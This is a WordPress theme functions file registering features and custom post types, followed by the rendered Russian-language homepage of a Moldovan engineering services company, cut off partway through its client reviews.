/** * ingener functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package ingener */ if ( ! defined( '_S_VERSION' ) ) { // Replace the version number of the theme on each release. define( '_S_VERSION', '1.0.0' ); } if ( ! function_exists( 'ingener_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. */ function ingener_setup() { /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. * If you're building a theme based on ingener, use a find and replace * to change 'ingener' to the name of your theme in all the template files. */ load_theme_textdomain( 'ingener', get_template_directory() . '/languages' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); /* * Enable support for Post Thumbnails on posts and pages. * * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/ */ add_theme_support( 'post-thumbnails' ); // This theme uses wp_nav_menu() in one location. register_nav_menus( array( 'menu-1' => esc_html__( 'Primary', 'ingener' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'style', 'script', ) ); // Set up the WordPress core custom background feature. add_theme_support( 'custom-background', apply_filters( 'ingener_custom_background_args', array( 'default-color' => 'ffffff', 'default-image' => '', ) ) ); // Add theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); /** * Add support for core custom logo. * * @link https://codex.wordpress.org/Theme_Logo */ add_theme_support( 'custom-logo', array( 'height' => 250, 'width' => 250, 'flex-width' => true, 'flex-height' => true, ) ); } endif; add_action( 'after_setup_theme', 'ingener_setup' ); /** * Set the content width in pixels, based on the theme's design and stylesheet. * * Priority 0 to make it available to lower priority callbacks. * * @global int $content_width */ function ingener_content_width() { $GLOBALS['content_width'] = apply_filters( 'ingener_content_width', 640 ); } add_action( 'after_setup_theme', 'ingener_content_width', 0 ); /** * Register widget area. * * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar */ function ingener_widgets_init() { register_sidebar( array( 'name' => esc_html__( 'Sidebar', 'ingener' ), 'id' => 'sidebar-1', 'description' => esc_html__( 'Add widgets here.', 'ingener' ), 'before_widget' => '<section id="%1$s" class="widget %2$s">', 'after_widget' => '</section>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', ) ); } add_action( 'widgets_init', 'ingener_widgets_init' ); /** * Enqueue scripts and styles. */ function ingener_scripts() { /* start STYLES */ // Font awesome CSS wp_enqueue_style( 'fontawesome-all', get_template_directory_uri() . '/css/fontawesome/all.min.css', array(), _S_VERSION ); wp_enqueue_style( 'fontawesome-min', get_template_directory_uri() . '/css/fontawesome/fontawesome.min.css', array(), _S_VERSION ); // Bootstrap CSS wp_enqueue_style( 'bootstrap-min', get_template_directory_uri() . '/css/bootstrap/bootstrap.min.css', array(), _S_VERSION ); wp_enqueue_style( 'bootstrap-grid', get_template_directory_uri() . '/css/bootstrap/bootstrap-grid.min.css', array(), _S_VERSION ); wp_enqueue_style( 'bootstrap-reboot', get_template_directory_uri() . '/css/bootstrap/bootstrap-reboot.min.css', array(), _S_VERSION ); // Slick slider CSS wp_enqueue_style( 'slick-css', get_template_directory_uri() . '/css/slick/slick.css', array(), _S_VERSION ); // lightbox CSS wp_enqueue_style( 'lightbox-css', get_template_directory_uri() . '/css/lightbox.css', array(), _S_VERSION ); // Main CSS wp_enqueue_style( 'ingener-style', get_stylesheet_uri(), array(), _S_VERSION ); wp_style_add_data( 'ingener-style', 'rtl', 'replace' ); /* end STYLES */ /* start SCRIPTS */ wp_enqueue_script( 'ingener-navigation', get_template_directory_uri() . '/js/navigation.js', array(), _S_VERSION, true ); // jQuery JS wp_enqueue_script( 'jQuery-js', get_template_directory_uri() . '/js/jQuery.js', array(), _S_VERSION, true ); // Slick JS wp_enqueue_script( 'slick-js', get_template_directory_uri() . '/js/slick.min.js', array(), _S_VERSION, true ); // Main JS wp_enqueue_script( 'main-js', get_template_directory_uri() . '/js/script.js', array(), _S_VERSION, true ); // Lightbox JS wp_enqueue_script( 'lightbox-js', get_template_directory_uri() . '/js/lightbox.js', array(), _S_VERSION, true ); if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } /* end SCRIPTS */ // Enqueue scripts and styles only for selected pages global $post; if( is_page() || is_single() ) { switch($post->post_name) { // case 'contacts': // wp_enqueue_script('contactsJS', get_template_directory_uri() . '/js/contacts.js', array(), _S_VERSION, true); // break; // case 'services': // wp_enqueue_script('servicesJS', get_template_directory_uri() . '/js/services.js', array(), _S_VERSION, true); // break; } } if(is_front_page()) { // wp_enqueue_script('homeJS', get_template_directory_uri() . '/js/home.js', array(), _S_VERSION, true); } } add_action( 'wp_enqueue_scripts', 'ingener_scripts' ); /** * Implement the Custom Header feature. */ require get_template_directory() . '/inc/custom-header.php'; /** * Custom template tags for this theme. */ require get_template_directory() . '/inc/template-tags.php'; /** * Functions which enhance the theme by hooking into WordPress. */ require get_template_directory() . '/inc/template-functions.php'; /** * Customizer additions. */ require get_template_directory() . '/inc/customizer.php'; /** * Load Jetpack compatibility file. */ if ( defined( 'JETPACK__VERSION' ) ) { require get_template_directory() . '/inc/jetpack.php'; } /* Add Option Page for Advanced Custom Field */ add_action('acf/init', 'my_acf_op_init'); function my_acf_op_init() { // Check function exists. if( function_exists('acf_add_options_sub_page') ) { // Add parent. $parent = acf_add_options_page(array( 'page_title' => 'Ingener Theme', 'menu_title' => 'Ingener Theme', 'icon_url' => 'dashicons-align-right', // Add this line and replace the second inverted commas with class of the icon you like 'position' => 29, 'redirect' => false, )); // Add sub pages $child = acf_add_options_sub_page(array( 'page_title' => 'Header', 'menu_title' => 'Header', 'parent_slug' => $parent['menu_slug'], )); $child2 = acf_add_options_sub_page(array( 'page_title' => 'Footer', 'menu_title' => 'Footer', 'parent_slug' => $parent['menu_slug'], )); } } /* Custom post type Services */ function post_services() { $labels = array( 'name' => _x( 'Services', 'Post Type General Name', 'ingener' ), 'singular_name' => _x( 'Services', 'Post Type Singular Name', 'ingener' ), 'menu_name' => __( 'Services', 'ingener' ), 'name_admin_bar' => __( 'Services', 'ingener' ), 'archives' => __( 'Services Archives', 'ingener' ), 'attributes' => __( 'Services Attributes', 'ingener' ), 'parent_item_colon' => __( 'Parent Item:', 'ingener' ), 'all_items' => __( 'All Items', 'ingener' ), 'add_new_item' => __( 'Add New Item', 'ingener' ), 'add_new' => __( 'Add New', 'ingener' ), 'new_item' => __( 'New Item', 'ingener' ), 'edit_item' => __( 'Edit Item', 'ingener' ), 'update_item' => __( 'Update Item', 'ingener' ), 'view_item' => __( 'View Item', 'ingener' ), 'view_items' => __( 'View Items', 'ingener' ), 'search_items' => __( 'Search Item', 'ingener' ), 'not_found' => __( 'Not found', 'ingener' ), 'not_found_in_trash' => __( 'Not found in Trash', 'ingener' ), 'featured_image' => __( 'Featured Image', 'ingener' ), 'set_featured_image' => __( 'Set featured image', 'ingener' ), 'remove_featured_image' => __( 'Remove featured image', 'ingener' ), 'use_featured_image' => __( 'Use as featured image', 'ingener' ), 'insert_into_item' => __( 'Insert into item', 'ingener' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'ingener' ), 'items_list' => __( 'Items list', 'ingener' ), 'items_list_navigation' => __( 'Items list navigation', 'ingener' ), 'filter_items_list' => __( 'Filter items list', 'ingener' ), ); $args = array( 'label' => __( 'Services', 'ingener' ), 'description' => __( 'Post Type Description', 'ingener' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail', 'excerpt' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-feedback', ); register_post_type( 'post-services', $args ); } add_action( 'init', 'post_services', 0 ); /* Custom post type Projects */ function post_type_projects() { $labels = array( 'name' => _x( 'Projects', 'Post Type General Name', 'in' ), 'singular_name' => _x( 'Projects', 'Post Type Singular Name', 'in' ), 'menu_name' => __( 'Projects', 'in' ), 'name_admin_bar' => __( 'Projects', 'in' ), 'archives' => __( 'Projects Archives', 'in' ), 'attributes' => __( 'Projects Attributes', 'in' ), 'parent_item_colon' => __( 'Parent Item:', 'in' ), 'all_items' => __( 'All Items', 'in' ), 'add_new_item' => __( 'Add New Item', 'in' ), 'add_new' => __( 'Add New', 'in' ), 'new_item' => __( 'New Item', 'in' ), 'edit_item' => __( 'Edit Item', 'in' ), 'update_item' => __( 'Update Item', 'in' ), 'view_item' => __( 'View Item', 'in' ), 'view_items' => __( 'View Items', 'in' ), 'search_items' => __( 'Search Item', 'in' ), 'not_found' => __( 'Not found', 'in' ), 'not_found_in_trash' => __( 'Not found in Trash', 'in' ), 'featured_image' => __( 'Featured Image', 'in' ), 'set_featured_image' => __( 'Set featured image', 'in' ), 'remove_featured_image' => __( 'Remove featured image', 'in' ), 'use_featured_image' => __( 'Use as featured image', 'in' ), 'insert_into_item' => __( 'Insert into item', 'in' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'in' ), 'items_list' => __( 'Items list', 'in' ), 'items_list_navigation' => __( 'Items list navigation', 'in' ), 'filter_items_list' => __( 'Filter items list', 'in' ), ); $args = array( 'label' => __( 'Projects', 'in' ), 'description' => __( 'Post Type Description', 'in' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-images-alt2', ); register_post_type( 'post-projects', $args ); } add_action( 'init', 'post_type_projects', 0 ); /* Custom post type Testimonials */ function post_type_testimonials() { $labels = array( 'name' => _x( 'Testimonials', 'Post Type General Name', 'in' ), 'singular_name' => _x( 'Testimonials', 'Post Type Singular Name', 'in' ), 'menu_name' => __( 'Testimonials', 'in' ), 'name_admin_bar' => __( 'Testimonials', 'in' ), 'archives' => __( 'Testimonials Archives', 'in' ), 'attributes' => __( 'Testimonials Attributes', 'in' ), 'parent_item_colon' => __( 'Parent Item:', 'in' ), 'all_items' => __( 'All Items', 'in' ), 'add_new_item' => __( 'Add New Item', 'in' ), 'add_new' => __( 'Add New', 'in' ), 'new_item' => __( 'New Item', 'in' ), 'edit_item' => __( 'Edit Item', 'in' ), 'update_item' => __( 'Update Item', 'in' ), 'view_item' => __( 'View Item', 'in' ), 'view_items' => __( 'View Items', 'in' ), 'search_items' => __( 'Search Item', 'in' ), 'not_found' => __( 'Not found', 'in' ), 'not_found_in_trash' => __( 'Not found in Trash', 'in' ), 'featured_image' => __( 'Featured Image', 'in' ), 'set_featured_image' => __( 'Set featured image', 'in' ), 'remove_featured_image' => __( 'Remove featured image', 'in' ), 'use_featured_image' => __( 'Use as featured image', 'in' ), 'insert_into_item' => __( 'Insert into item', 'in' ), 'uploaded_to_this_item' => __( 'Uploaded to this item', 'in' ), 'items_list' => __( 'Items list', 'in' ), 'items_list_navigation' => __( 'Items list navigation', 'in' ), 'filter_items_list' => __( 'Filter items list', 'in' ), ); $args = array( 'label' => __( 'Testimonials', 'in' ), 'description' => __( 'Post Type Description', 'in' ), 'labels' => $labels, 'supports' => array( 'title', 'editor', 'thumbnail' ), 'hierarchical' => false, 'public' => true, 'show_ui' => true, 'show_in_menu' => true, 'menu_position' => 5, 'show_in_admin_bar' => true, 'show_in_nav_menus' => true, 'can_export' => true, 'has_archive' => true, 'exclude_from_search' => false, 'publicly_queryable' => true, 'capability_type' => 'page', 'menu_icon' => 'dashicons-format-status' ); register_post_type( 'post-testimonials', $args ); } add_action( 'init', 'post_type_testimonials', 0 ); // <!-- go Custom Shortcode --> function custom_shortcode( ) { return get_field("sales_section_percent"); } add_shortcode( 'shortcode', 'custom_shortcode' ); ?> <!doctype html> <html lang="ru-RU"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/inginer.md\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.19"}}; !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://inginer.md/wp-includes/css/dist/block-library/style.min.css?ver=5.5.19' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://inginer.md/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3' type='text/css' media='all' /> <script type='text/javascript' src='https://inginer.md/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script> <link rel="https://api.w.org/" href="https://inginer.md/wp-json/" /><link rel="alternate" type="application/json" href="https://inginer.md/wp-json/wp/v2/pages/11" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://inginer.md/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://inginer.md/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.5.19" /> <link rel="canonical" href="https://inginer.md/" /> <link rel='shortlink' href='https://inginer.md/' /> <link rel="alternate" type="application/json+oembed" href="https://inginer.md/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finginer.md%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://inginer.md/wp-json/oembed/1.0/embed?url=https%3A%2F%2Finginer.md%2F&format=xml" /> <style type="text/css"> .qtranxs_flag_ro {background-image: url(https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png); background-repeat: no-repeat;} .qtranxs_flag_ru {background-image: url(https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png); background-repeat: no-repeat;} </style> <link hreflang="ro" href="https://inginer.md/ro/" rel="alternate" /> <link hreflang="ru" href="https://inginer.md/ru/" rel="alternate" /> <link hreflang="x-default" href="https://inginer.md/" rel="alternate" /> <meta name="generator" content="qTranslate-XT 3.8.1" /> <link rel="icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-32x32.jpg" sizes="32x32" /> <link rel="icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon" href="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-180x180.jpg" /> <meta name="msapplication-TileImage" content="https://inginer.md/wp-content/uploads/2020/11/cropped-ok-rebr-1-270x270.jpg" /> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-11S0L0M3X7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-11S0L0M3X7'); </script> </head> <body class="home page-template-default page page-id-11"> <div class="app"> <header> <div class="top-header"> <div class="container"> <div class="row center"> <div class="col-lg-2 col-md-6 col-xs-6 col-6 col-sm-6 logo"><a href="https://inginer.md"><img src="https://inginer.md/wp-content/uploads/2020/11/logo.png" alt=""></a></div> <div class="col-lg-6 menu"> <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-610" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-610"><a href="https://inginer.md/about-us/">О нас</a></li> <li id="menu-item-27" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27"><a href="https://inginer.md/services/">Услуги</a></li> <li id="menu-item-477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-477"><a href="https://inginer.md/proekty/">Проекты</a></li> <li id="menu-item-25" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-25"><a href="https://inginer.md/contacts/">Контакты</a></li> <li id="menu-item-846" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-846"><a href="https://inginer.md/news/">Полезные советы</a></li> </ul></div> <!-- <ul> <li><a href="services.php">Услуги</a> <ul class='drop-down'> <li><a href="">Тест2</a></li> <li><a href="">Тест123</a></li> <li><a href="">Нетест</a></li> </ul> </li> <li><a href="about.php">О нас</a> <ul class='drop-down'> <li><a href="">Тест2</a></li> <li><a href="">Тест123</a></li> <li><a href="">Нетест</a></li> </ul> </li> <li><a href="news.php">Новости</a></li> <li><a href="contacts.php">Контакты</a></li> </ul> --> </div> <div class="col-lg-4 right-top-menu"> <a href="tel:022-21-20-21">022-21-20-21</a> <a href="tel:0790-555-44">0790-555-44</a> <ul class="language-chooser language-chooser-image qtranxs_language_chooser" id="qtranslate-chooser"> <li class="lang-ro"><a href="https://inginer.md/ro/" hreflang="ro" title="Română (ro)" class="qtranxs_image qtranxs_image_ro"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png" alt="Română (ro)" /><span style="display:none">Română</span></a></li> <li class="lang-ru active"><a href="https://inginer.md/ru/" hreflang="ru" title="Русский (ru)" class="qtranxs_image qtranxs_image_ru"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png" alt="Русский (ru)" /><span style="display:none">Русский</span></a></li> </ul><div class="qtranxs_widget_end"></div> </div> <div class="col-md-4 col-xs-4 col-sm-4 col-4 clear-head"></div> <div class="menu-mobile col-md-2 col-xs-2 col-sm-2 col-2"> <div class="burger"> <div class="burger__item burger__item--top"></div> <div class="burger__item burger__item--mid"></div> <div class="burger__item burger__item--bottom"></div> </div> </div> </div> </div> </div> <div class="language__box"> <ul class="language-chooser language-chooser-image qtranxs_language_chooser" id="qtranslate-chooser"> <li class="lang-ro"><a href="https://inginer.md/ro/" hreflang="ro" title="Română (ro)" class="qtranxs_image qtranxs_image_ro"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ro.png" alt="Română (ro)" /><span style="display:none">Română</span></a></li> <li class="lang-ru active"><a href="https://inginer.md/ru/" hreflang="ru" title="Русский (ru)" class="qtranxs_image qtranxs_image_ru"><img src="https://inginer.md/wp-content/plugins/qtranslate-xt-master/flags/ru.png" alt="Русский (ru)" /><span style="display:none">Русский</span></a></li> </ul><div class="qtranxs_widget_end"></div> </div> </header> <div class="content-mid"> <div class="slider-main"> </div> </div> <div class="title"> Наши услуги </div> <div class="container pb-40"> <div class="row"> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/proektirovanie/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Проектирование </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/proektirovanie/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/echipamente/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Комплектация оборудованием </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/echipamente/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/montazh/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Монтаж </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/montazh/"> Подробнее </a></div> </div> </div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="item-uslg"> <a href="https://inginer.md/test/"> <img src="" alt=""> </a> <div class="over-item"> <div class="title-item"> Сервисное обслуживание </div> </div> </div> <div class="center"> <div class="bth-next"><a href="https://inginer.md/test/"> Подробнее </a></div> </div> </div> </div> </div> <div class="form-sale" style="background-image: url()"> <div class="plenka"></div> <div class="form-for-sale mt-30"> <div class="title-form-sale center"> Напиши нам и получи скидку на установку в 15% </div> <div role="form" class="wpcf7" id="wpcf7-f104-o1" lang="en-US" dir="ltr"> <div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div> <form action="/#wpcf7-f104-o1" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="104" /> <input type="hidden" name="_wpcf7_version" value="5.3" /> <input type="hidden" name="_wpcf7_locale" value="en_US" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f104-o1" /> <input type="hidden" name="_wpcf7_container_post" value="0" /> <input type="hidden" name="_wpcf7_posted_data_hash" value="" /> </div> <div class="center"> <div class="row form-sale-inputs"> <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12"> <span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required important" id="name_sale" aria-required="true" aria-invalid="false" placeholder="Имя" /></span> </div> <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12"> <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email important" id="name_sale" aria-required="true" aria-invalid="false" placeholder="Электронная почта" /></span> </div> <div class="col-lg-4 sales__button"> <input type="submit" value="Получить скидку" class="wpcf7-form-control wpcf7-submit" /> </div> </div> </div> <div class="wpcf7-response-output" aria-hidden="true"></div></form></div> </div> </div> <div class="counter-block"> <div class="container"> <div class="row center"> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-check-circle"></i></div> <div class="col-lg-9"> <div class="count">10000</div> <div class="title-count">Благодарных клиентов</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="fas fa-receipt"></i></div> <div class="col-lg-9"> <div class="count">8000</div> <div class="title-count">Установленных систем</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-sun"></i></div> <div class="col-lg-9"> <div class="count">20</div> <div class="title-count">Лет на рынке</div> </div> </div></div> <div class="col-lg-3 col-md-6 col-sm-6 col-xs-12"> <div class="row center"> <div class="col-lg-3"> <i class="far fa-smile"></i></i></div> <div class="col-lg-9"> <div class="count">2500</div> <div class="title-count">Отзывов</div> </div> </div></div> </div> </div> </div> <div class="container pb-80"> <div class="small-title">Мы не боимся показать свою работу</div> <div class="title">Реализованые проекты</div> <div class="slider"> <div class="slider-projects"> <div class="slide-proj"> <a href="https://inginer.md/zhiloj-kompeks-testimiczianu/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-2-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Компекс «Тестимициану» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/zavod-genesis/"> <div class="img-block-proj"> <img src="" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Завод «Genesis» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/gosudarstvennaya-registraczionnaya-pal/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-1-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Государственная регистрационная палата </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/administrativnoe-zdanie-otel/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-3-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Административное здание. Отель </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/otel-kodru/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-4-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Отель «Кодру» </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> <div class="slide-proj"> <a href="https://inginer.md/montazh-sistem-v-prizidenture/"> <div class="img-block-proj"> <img src="<img width="350" height="260" src="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" loading="lazy" srcset="https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5.jpg 350w, https://inginer.md/wp-content/uploads/2020/11/Без-имени-1-5-300x223.jpg 300w" sizes="(max-width: 350px) 100vw, 350px" />" alt=""> </div> <div class="proj-inf-block"> <div class="row center"> <div class="col-lg-8"> <div class="title-proj"> Президентура Республики Молдова </div> </div> <div class="col-lg-4 price"> <div></div> <div></div> </div> </div> </div> </a> </div> </div> <div class="prev-proj"><i class="fas fa-chevron-left"></i></div> <div class="next-proj"><i class="fas fa-chevron-right"></i></div> </div> </div> <div class="container"> <div class="small-title">Что наши клиенты</div> <div class="title">Говорят он нас</div> <div class="review"> <div class="row slider-reviews"> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Валерий Буцан</div> <div class="company-reviews">SALONIX</div> <div class="stars-reviews"> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">«Мы рекомендуем компанию« Piroterm-Service »SRL и ее сотрудников как надежного партнера, который вовремя выполняет свои договорные обязательства, предлагая оперативные услуги по конкурентоспособным ценам».</div> </div> </div> </div> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Пушкару Светлана</div> <div class="company-reviews"></div> <div class="stars-reviews"> <i class="fas 